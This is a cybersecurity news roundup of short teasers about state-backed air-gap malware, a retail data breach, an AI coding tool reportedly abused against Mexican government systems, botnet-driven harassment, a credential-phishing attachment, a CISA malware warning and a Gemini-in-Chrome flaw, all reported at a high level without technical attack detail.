North Korean hackers are deploying newly uncovered tools to move data between internet-connected and air-gapped systems, spread via removable drives, and conduct covert surveillance. The malicious campaign has been named Ruby Jumper and is attributed to the state-backed group APT37, also known as ScarCruft, Ricochet Chollima, and InkySquid. Air-gapped computers are disconnected from external networks, especially the public internet. READ MORE...
More than 38 million accounts were affected by an October 2025 data breach at Canadian retail giant Canadian Tire. The incident was discovered on October 2 and involved unauthorized access to an e-commerce database, the company said. "The database contained basic personal information for customers who have an e-commerce account with one or more of Canadian Tire, SportChek, Mark's/L'Équipeur and Party City," the retail giant announced in October. READ MORE...
Anthropic's Claude Code assistant has been abused in a cyberattack against the Mexican government's systems, Israeli cybersecurity startup Gambit Security reports. As part of the attack, ten Mexican government bodies and a financial institution were compromised, beginning with the country's tax authority in late December 2025. Mexico City's civil registry and health department, the national electoral institute, local governments in four cities, and a water utility were hacked. READ MORE...
In early January 2026, KrebsOnSecurity revealed how a security researcher disclosed a vulnerability that was used to build Kimwolf, the world's largest and most disruptive botnet. Since then, the person in control of Kimwolf - who goes by the handle "Dort" - has coordinated a barrage of distributed denial-of-service (DDoS), doxing and email flooding attacks against the researcher and this author, and more recently caused a SWAT team to be sent to the researcher's home. READ MORE...
An attachment named New PO 500PCS.pdf.hTM, posing as a purchase order in PDF form, turned out to be something entirely different: a credential-harvesting web page that quietly sent passwords and IP/location data straight to a Telegram bot controlled by an attacker. Imagine you're in accounts payable, sales, or operations. Your day is a steady flow of invoices, purchase orders, and approvals. An email like this may look like just another item in your daily queue. READ MORE...
The Cybersecurity and Infrastructure Security Agency on Thursday warned that a malware variant previously used in attacks against Ivanti Connect Secure environments may remain undetected on systems. In March 2025, CISA issued an alert about the malware, dubbed Resurge, in connection with exploitation of CVE-2025-0282, a stack-based buffer overflow vulnerability in certain versions of Ivanti Connect Secure and other Ivanti products. READ MORE...
With the FIFA World Cup coming to the United States, Canada, and Mexico this year, cybersecurity experts are warning that the risks are rising from rapidly evolving threats such as drones and wireless surveillance. Wireless communications have grown in importance and criticality, with connections to security systems, operational technology (OT), and application connectivity all expanding dramatically over the past decade. READ MORE...
Google has fixed a high-severity flaw in its implemention of Gemini AI in the Chrome browser that could have allowed attackers to escalate privileges, violate user privacy while browsing, and access sensitive system resources. Researchers said that the vulnerability demonstrates new security hazards that come with the deployment and use of agentic browsers that have AI built in. Specifically, the flaw could have allowed malicious browser extensions with to escalate privileges. READ MORE...